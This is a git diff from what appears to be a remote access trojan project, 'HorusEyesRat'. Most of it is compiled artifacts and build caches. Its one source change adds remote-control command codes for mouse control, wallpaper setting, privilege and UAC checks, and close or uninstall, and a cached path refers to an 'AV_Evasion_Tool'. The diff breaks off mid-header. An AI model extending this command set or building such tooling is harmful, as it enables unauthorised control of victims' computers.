diff --git a/PR/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed b/PR/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..baf979e Binary files /dev/null and b/PR/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed differ diff --git a/PR/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed b/PR/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed new file mode 100644 index 0000000..2c67faa Binary files /dev/null and b/PR/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed differ diff --git a/PR/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed b/PR/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed new file mode 100644 index 0000000..a4645e4 Binary files /dev/null and b/PR/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed differ diff --git a/PR/obj/Release/Costura/A18244114E20512538291BA68BA3AD1BAD3A6CF4.costura.native.pdb.compressed b/PR/obj/Release/Costura/A18244114E20512538291BA68BA3AD1BAD3A6CF4.costura.native.pdb.compressed new file mode 100644 index 0000000..982a6c8 Binary files /dev/null and b/PR/obj/Release/Costura/A18244114E20512538291BA68BA3AD1BAD3A6CF4.costura.native.pdb.compressed differ diff --git a/PR/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/PR/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..c2d5c29 Binary files /dev/null and b/PR/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/PR/obj/Release/PR.csproj.CopyComplete b/PR/obj/Release/PR.csproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/PR/obj/Release/PR.csproj.CoreCompileInputs.cache b/PR/obj/Release/PR.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..5f4edfe --- /dev/null +++ b/PR/obj/Release/PR.csproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +e77585ac4f331f72e82b32083bd6242401d4afa2 diff --git a/PR/obj/Release/PR.csproj.FileListAbsolute.txt b/PR/obj/Release/PR.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..5efad90 --- /dev/null +++ b/PR/obj/Release/PR.csproj.FileListAbsolute.txt @@ -0,0 +1,11 @@ +Z:\HorusEyesRat-master\PR\bin\Release\PR.dll +Z:\HorusEyesRat-master\PR\bin\Release\PR.pdb +Z:\HorusEyesRat-master\PR\obj\Release\PR.csproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\PR\obj\Release\PR.dll +Z:\HorusEyesRat-master\PR\obj\Release\PR.pdb +Z:\HorusEyesRat-master\PR\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\PR\obj\Release\PR.csproj.CopyComplete +Z:\HorusEyesRat-master\PR\obj\Release\PR.csproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\PR.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\PR.pdb +Z:\HorusEyesRat-master\PR\obj\Release\PR.csprojAssemblyReference.cache diff --git a/PR/obj/Release/PR.csproj.Fody.CopyLocal.cache b/PR/obj/Release/PR.csproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..f266130 --- /dev/null +++ b/PR/obj/Release/PR.csproj.Fody.CopyLocal.cache @@ -0,0 +1,2 @@ +F:\Personal\C#\AV_Evasion_Tool-3.0\AV_Evasion_Tool-3.0\Native\bin\Debug\Native.dll.config +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.xml diff --git a/PR/obj/Release/PR.csprojAssemblyReference.cache b/PR/obj/Release/PR.csprojAssemblyReference.cache new file mode 100644 index 0000000..41fde9e Binary files /dev/null and b/PR/obj/Release/PR.csprojAssemblyReference.cache differ diff --git a/PR/obj/Release/PR.dll b/PR/obj/Release/PR.dll new file mode 100644 index 0000000..6ec53b4 Binary files /dev/null and b/PR/obj/Release/PR.dll differ diff --git a/PR/obj/Release/PR.pdb b/PR/obj/Release/PR.pdb new file mode 100644 index 0000000..d13d7ae Binary files /dev/null and b/PR/obj/Release/PR.pdb differ diff --git a/PR/packages.config b/PR/packages.config new file mode 100644 index 0000000..4a26327 --- /dev/null +++ b/PR/packages.config @@ -0,0 +1,5 @@ + + + + + \ No newline at end of file diff --git a/PW/PW.vbproj b/PW/PW.vbproj index eea99a0..3c974ec 100644 --- a/PW/PW.vbproj +++ b/PW/PW.vbproj @@ -30,7 +30,7 @@ false true true - bin\Release\ + ..\Server\bin\Release\Plugins\ PW.xml 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -60,7 +60,7 @@ - + diff --git a/PW/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/PW/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/PW/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/PW/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/PW/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/PW/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/PW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/PW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 1f45bb3..254f147 100644 Binary files a/PW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/PW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/PW/obj/Debug/PW.dll b/PW/obj/Debug/PW.dll index 29d9870..eedc75e 100644 Binary files a/PW/obj/Debug/PW.dll and b/PW/obj/Debug/PW.dll differ diff --git a/PW/obj/Debug/PW.pdb b/PW/obj/Debug/PW.pdb index 4108a77..0e54829 100644 Binary files a/PW/obj/Debug/PW.pdb and b/PW/obj/Debug/PW.pdb differ diff --git a/PW/obj/Debug/PW.vbproj.CoreCompileInputs.cache b/PW/obj/Debug/PW.vbproj.CoreCompileInputs.cache index 0f2cd94..bf7babe 100644 --- a/PW/obj/Debug/PW.vbproj.CoreCompileInputs.cache +++ b/PW/obj/Debug/PW.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -24451db3c270d182354e38f9877b0d84ab23e0ff +1167e6e4d9cfaa64453698fc09b398eacda12bc4 diff --git a/PW/obj/Debug/PW.vbproj.FileListAbsolute.txt b/PW/obj/Debug/PW.vbproj.FileListAbsolute.txt index 7b2c9b3..ba0c922 100644 --- a/PW/obj/Debug/PW.vbproj.FileListAbsolute.txt +++ b/PW/obj/Debug/PW.vbproj.FileListAbsolute.txt @@ -37,3 +37,16 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\PW\obj\Debug\PW.xml C:\Users\mehdi\Documents\HorusEyesRat-main\PW\obj\Debug\PW.pdb C:\Users\mehdi\Documents\HorusEyesRat-main\PW\bin\Debug\PacketLib.xml C:\Users\mehdi\Documents\HorusEyesRat-main\PW\obj\Debug\PW.vbproj.CopyComplete +Z:\HorusEyesRat-master\PW\bin\Debug\PW.dll +Z:\HorusEyesRat-master\PW\bin\Debug\PW.pdb +Z:\HorusEyesRat-master\PW\bin\Debug\PW.xml +Z:\HorusEyesRat-master\PW\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PW\obj\Debug\PW.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\PW\obj\Debug\PL.Resources.resources +Z:\HorusEyesRat-master\PW\obj\Debug\PW.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\PW\obj\Debug\PW.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\PW\obj\Debug\PW.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\PW\obj\Debug\PW.vbproj.CopyComplete +Z:\HorusEyesRat-master\PW\obj\Debug\PW.dll +Z:\HorusEyesRat-master\PW\obj\Debug\PW.xml +Z:\HorusEyesRat-master\PW\obj\Debug\PW.pdb diff --git a/PW/obj/Debug/PW.vbproj.Fody.CopyLocal.cache b/PW/obj/Debug/PW.vbproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/PW/obj/Debug/PW.vbproj.Fody.CopyLocal.cache +++ b/PW/obj/Debug/PW.vbproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/PW/obj/Debug/PW.vbproj.GenerateResource.cache b/PW/obj/Debug/PW.vbproj.GenerateResource.cache index ae4d4aa..0b103ff 100644 Binary files a/PW/obj/Debug/PW.vbproj.GenerateResource.cache and b/PW/obj/Debug/PW.vbproj.GenerateResource.cache differ diff --git a/PW/obj/Debug/PW.vbprojAssemblyReference.cache b/PW/obj/Debug/PW.vbprojAssemblyReference.cache index 2ad880a..f061b20 100644 Binary files a/PW/obj/Debug/PW.vbprojAssemblyReference.cache and b/PW/obj/Debug/PW.vbprojAssemblyReference.cache differ diff --git a/PW/obj/Debug/TempPE/My Project.Application.Designer.vb.dll b/PW/obj/Debug/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..3982820 Binary files /dev/null and b/PW/obj/Debug/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/PW/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll b/PW/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..bb752bb Binary files /dev/null and b/PW/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/PW/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/PW/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/PW/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/PW/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/PW/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/PW/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/PW/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/PW/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/PW/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/PW/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/PW/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/PW/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/PW/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/PW/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..968f281 Binary files /dev/null and b/PW/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/PW/obj/Release/PL.Resources.resources b/PW/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/PW/obj/Release/PL.Resources.resources differ diff --git a/PW/obj/Release/PW.dll b/PW/obj/Release/PW.dll new file mode 100644 index 0000000..cc0143c Binary files /dev/null and b/PW/obj/Release/PW.dll differ diff --git a/PW/obj/Release/PW.pdb b/PW/obj/Release/PW.pdb new file mode 100644 index 0000000..880a343 Binary files /dev/null and b/PW/obj/Release/PW.pdb differ diff --git a/PW/obj/Release/PW.vbproj.CopyComplete b/PW/obj/Release/PW.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/PW/obj/Release/PW.vbproj.CoreCompileInputs.cache b/PW/obj/Release/PW.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..15c13c2 --- /dev/null +++ b/PW/obj/Release/PW.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +660e3872eb3d0efffce2f059955f121dbd3974b8 diff --git a/PW/obj/Release/PW.vbproj.FileListAbsolute.txt b/PW/obj/Release/PW.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..3c8b383 --- /dev/null +++ b/PW/obj/Release/PW.vbproj.FileListAbsolute.txt @@ -0,0 +1,16 @@ +Z:\HorusEyesRat-master\PW\bin\Release\PW.dll +Z:\HorusEyesRat-master\PW\bin\Release\PW.pdb +Z:\HorusEyesRat-master\PW\bin\Release\PW.xml +Z:\HorusEyesRat-master\PW\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\PW.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\PW.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\PW.xml +Z:\HorusEyesRat-master\PW\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\PW\obj\Release\PW.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\PW\obj\Release\PW.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\PW\obj\Release\PW.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\PW\obj\Release\PW.vbproj.CopyComplete +Z:\HorusEyesRat-master\PW\obj\Release\PW.dll +Z:\HorusEyesRat-master\PW\obj\Release\PW.xml +Z:\HorusEyesRat-master\PW\obj\Release\PW.pdb +Z:\HorusEyesRat-master\PW\obj\Release\PW.vbprojAssemblyReference.cache diff --git a/PW/obj/Release/PW.vbproj.Fody.CopyLocal.cache b/PW/obj/Release/PW.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..c1cd591 --- /dev/null +++ b/PW/obj/Release/PW.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/PW/obj/Release/PW.vbproj.GenerateResource.cache b/PW/obj/Release/PW.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/PW/obj/Release/PW.vbproj.GenerateResource.cache differ diff --git a/PW/obj/Release/PW.vbprojAssemblyReference.cache b/PW/obj/Release/PW.vbprojAssemblyReference.cache new file mode 100644 index 0000000..8269b45 Binary files /dev/null and b/PW/obj/Release/PW.vbprojAssemblyReference.cache differ diff --git a/PW/obj/Release/PW.xml b/PW/obj/Release/PW.xml new file mode 100644 index 0000000..57d453c --- /dev/null +++ b/PW/obj/Release/PW.xml @@ -0,0 +1,26 @@ + + + + +PW + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + + diff --git a/PW/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/PW/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..951235a Binary files /dev/null and b/PW/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/PW/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/PW/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..884f2ff Binary files /dev/null and b/PW/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/PacketLib/Packet.vb b/PacketLib/Packet.vb index 179e8e1..815367f 100644 --- a/PacketLib/Packet.vb +++ b/PacketLib/Packet.vb @@ -13,7 +13,8 @@ Public Class Packet End Class Public Enum PacketType As Integer - MSG = &H5057 + CLOSE = &H5057 + U_CLOSE = &H5055 File = &H5056 PLUGIN = &H0 ID = &H1 @@ -27,6 +28,8 @@ Public Class Packet ERROR_LOAD_NATIVE_DLL = &H9 SUCCESS_LOAD_NATIVE_DLL = &H10 + + PLUGIN_CS_RES = &H11 End Enum Public Enum Packet_Subject @@ -71,6 +74,19 @@ Public Class Packet BLUR_LK_STOP = &H322 INJECT_NATIVE = &H323 + + MS_LEFT = &H325 + MS_RIGHT = &H326 + MS_ALL = &H327 + MS_UNL = &H328 + MS_MV = &H329 + + SET_WPP = &H330 + + GET_PRIV = &H331 + GET_PRIO = &H332 + SET_PRIO = &H333 + CHECK_UAC = &H334 End Enum Public Class Packet_Send diff --git a/PacketLib/obj/Debug/PacketLib.dll b/PacketLib/obj/Debug/PacketLib.dll index c56e7f6..1fbf34a 100644 Binary files a/PacketLib/obj/Debug/PacketLib.dll and b/PacketLib/obj/Debug/PacketLib.dll differ diff --git a/PacketLib/obj/Debug/PacketLib.pdb b/PacketLib/obj/Debug/PacketLib.pdb index f183226..c24f602 100644 Binary files a/PacketLib/obj/Debug/PacketLib.pdb and b/PacketLib/obj/Debug/PacketLib.pdb differ diff --git a/PacketLib/obj/Debug/PacketLib.vbproj.FileListAbsolute.txt b/PacketLib/obj/Debug/PacketLib.vbproj.FileListAbsolute.txt index d96101b..f3ffc45 100644 --- a/PacketLib/obj/Debug/PacketLib.vbproj.FileListAbsolute.txt +++ b/PacketLib/obj/Debug/PacketLib.vbproj.FileListAbsolute.txt @@ -56,3 +56,13 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\obj\Debug\PacketLib.dll C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\obj\Debug\PacketLib.xml C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\obj\Debug\PacketLib.pdb C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\obj\Debug\PacketLib.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.dll +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.pdb +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\obj\Debug\PacketLib.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\PacketLib\obj\Debug\PacketLib.Resources.resources +Z:\HorusEyesRat-master\PacketLib\obj\Debug\PacketLib.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\PacketLib\obj\Debug\PacketLib.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\PacketLib\obj\Debug\PacketLib.dll +Z:\HorusEyesRat-master\PacketLib\obj\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\obj\Debug\PacketLib.pdb diff --git a/PacketLib/obj/Debug/PacketLib.vbproj.GenerateResource.cache b/PacketLib/obj/Debug/PacketLib.vbproj.GenerateResource.cache index ae4d4aa..0b103ff 100644 Binary files a/PacketLib/obj/Debug/PacketLib.vbproj.GenerateResource.cache and b/PacketLib/obj/Debug/PacketLib.vbproj.GenerateResource.cache differ diff --git a/PacketLib/obj/Debug/PacketLib.vbprojAssemblyReference.cache b/PacketLib/obj/Debug/PacketLib.vbprojAssemblyReference.cache index f57dc13..9f92743 100644 Binary files a/PacketLib/obj/Debug/PacketLib.vbprojAssemblyReference.cache and b/PacketLib/obj/Debug/PacketLib.vbprojAssemblyReference.cache differ diff --git a/PacketLib/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll b/PacketLib/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..a9aa546 Binary files /dev/null and b/PacketLib/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/PacketLib/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/PacketLib/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/PacketLib/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/PacketLib/obj/Release/PacketLib.Resources.resources b/PacketLib/obj/Release/PacketLib.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/PacketLib/obj/Release/PacketLib.Resources.resources differ diff --git a/PacketLib/obj/Release/PacketLib.dll b/PacketLib/obj/Release/PacketLib.dll new file mode 100644 index 0000000..919a078 Binary files /dev/null and b/PacketLib/obj/Release/PacketLib.dll differ diff --git a/PacketLib/obj/Release/PacketLib.pdb b/PacketLib/obj/Release/PacketLib.pdb new file mode 100644 index 0000000..4f3b59f Binary files /dev/null and b/PacketLib/obj/Release/PacketLib.pdb differ diff --git a/PacketLib/obj/Release/PacketLib.vbproj.CoreCompileInputs.cache b/PacketLib/obj/Release/PacketLib.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..ab47692 --- /dev/null +++ b/PacketLib/obj/Release/PacketLib.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +45358e3924f127476878a12f6690cf92591785ba diff --git a/PacketLib/obj/Release/PacketLib.vbproj.FileListAbsolute.txt b/PacketLib/obj/Release/PacketLib.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..a4520d3 --- /dev/null +++ b/PacketLib/obj/Release/PacketLib.vbproj.FileListAbsolute.txt @@ -0,0 +1,10 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.dll +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.pdb +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\obj\Release\PacketLib.Resources.resources +Z:\HorusEyesRat-master\PacketLib\obj\Release\PacketLib.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\PacketLib\obj\Release\PacketLib.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\PacketLib\obj\Release\PacketLib.dll +Z:\HorusEyesRat-master\PacketLib\obj\Release\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\obj\Release\PacketLib.pdb +Z:\HorusEyesRat-master\PacketLib\obj\Release\PacketLib.vbprojAssemblyReference.cache diff --git a/PacketLib/obj/Release/PacketLib.vbproj.GenerateResource.cache b/PacketLib/obj/Release/PacketLib.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/PacketLib/obj/Release/PacketLib.vbproj.GenerateResource.cache differ diff --git a/PacketLib/obj/Release/PacketLib.vbprojAssemblyReference.cache b/PacketLib/obj/Release/PacketLib.vbprojAssemblyReference.cache new file mode 100644 index 0000000..d9ed93c Binary files /dev/null and b/PacketLib/obj/Release/PacketLib.vbprojAssemblyReference.cache differ diff --git a/PacketLib/obj/Release/PacketLib.xml b/PacketLib/obj/Release/PacketLib.xml new file mode 100644 index 0000000..e9d8426 --- /dev/null +++ b/PacketLib/obj/Release/PacketLib.xml @@ -0,0 +1,26 @@ + + + + +PacketLib + + + + + + A strongly-typed resource class, for looking up localized strings, etc. + + + + + Returns the cached ResourceManager instance used by this class. + + + + + Overrides the current thread's CurrentUICulture property for all + resource lookups using this strongly typed resource class. + + + + diff --git a/PacketLib/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/PacketLib/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..e92986f Binary files /dev/null and b/PacketLib/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/SL/SL.vbproj b/SL/SL.vbproj index c499bc5..7003bdf 100644 --- a/SL/SL.vbproj +++ b/SL/SL.vbproj @@ -30,7 +30,7 @@ false true true - bin\Release\ + ..\Server\bin\Release\Plugins\ SL.xml 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -73,7 +73,7 @@ - + diff --git a/SL/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/SL/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/SL/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/SL/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/SL/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/SL/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/SL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/SL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 00d246f..66efafa 100644 Binary files a/SL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/SL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/SL/obj/Debug/SL.dll b/SL/obj/Debug/SL.dll index 0cccb9c..307dfed 100644 Binary files a/SL/obj/Debug/SL.dll and b/SL/obj/Debug/SL.dll differ diff --git a/SL/obj/Debug/SL.pdb b/SL/obj/Debug/SL.pdb index 7bed9bf..28723d8 100644 Binary files a/SL/obj/Debug/SL.pdb and b/SL/obj/Debug/SL.pdb differ diff --git a/SL/obj/Debug/SL.vbproj.CoreCompileInputs.cache b/SL/obj/Debug/SL.vbproj.CoreCompileInputs.cache index b263d56..d97f655 100644 --- a/SL/obj/Debug/SL.vbproj.CoreCompileInputs.cache +++ b/SL/obj/Debug/SL.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -cca2658c0a691042a6eab9e8cab4acfe16c37db0 +5e095ff5e8ef6d7093f0b856257050f45c85e176 diff --git a/SL/obj/Debug/SL.vbproj.FileListAbsolute.txt b/SL/obj/Debug/SL.vbproj.FileListAbsolute.txt index 677f1e7..1db8b13 100644 --- a/SL/obj/Debug/SL.vbproj.FileListAbsolute.txt +++ b/SL/obj/Debug/SL.vbproj.FileListAbsolute.txt @@ -11,3 +11,16 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\SL\obj\Debug\SL.xml C:\Users\mehdi\Documents\HorusEyesRat-main\SL\obj\Debug\SL.pdb C:\Users\mehdi\Documents\HorusEyesRat-main\SL\obj\Debug\SL.vbproj.Fody.CopyLocal.cache C:\Users\mehdi\Documents\HorusEyesRat-main\SL\obj\Debug\SL.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\SL\bin\Debug\SL.dll +Z:\HorusEyesRat-master\SL\bin\Debug\SL.pdb +Z:\HorusEyesRat-master\SL\bin\Debug\SL.xml +Z:\HorusEyesRat-master\SL\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\SL\obj\Debug\SL.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\SL\obj\Debug\PL.Resources.resources +Z:\HorusEyesRat-master\SL\obj\Debug\SL.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\SL\obj\Debug\SL.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\SL\obj\Debug\SL.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\SL\obj\Debug\SL.vbproj.CopyComplete +Z:\HorusEyesRat-master\SL\obj\Debug\SL.dll +Z:\HorusEyesRat-master\SL\obj\Debug\SL.xml +Z:\HorusEyesRat-master\SL\obj\Debug\SL.pdb diff --git a/SL/obj/Debug/SL.vbproj.Fody.CopyLocal.cache b/SL/obj/Debug/SL.vbproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/SL/obj/Debug/SL.vbproj.Fody.CopyLocal.cache +++ b/SL/obj/Debug/SL.vbproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/SL/obj/Debug/SL.vbproj.GenerateResource.cache b/SL/obj/Debug/SL.vbproj.GenerateResource.cache index ecad8f8..0b103ff 100644 Binary files a/SL/obj/Debug/SL.vbproj.GenerateResource.cache and b/SL/obj/Debug/SL.vbproj.GenerateResource.cache differ diff --git a/SL/obj/Debug/SL.vbprojAssemblyReference.cache b/SL/obj/Debug/SL.vbprojAssemblyReference.cache index 9c20112..f434fd6 100644 Binary files a/SL/obj/Debug/SL.vbprojAssemblyReference.cache and b/SL/obj/Debug/SL.vbprojAssemblyReference.cache differ diff --git a/SL/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/SL/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/SL/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/SL/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed 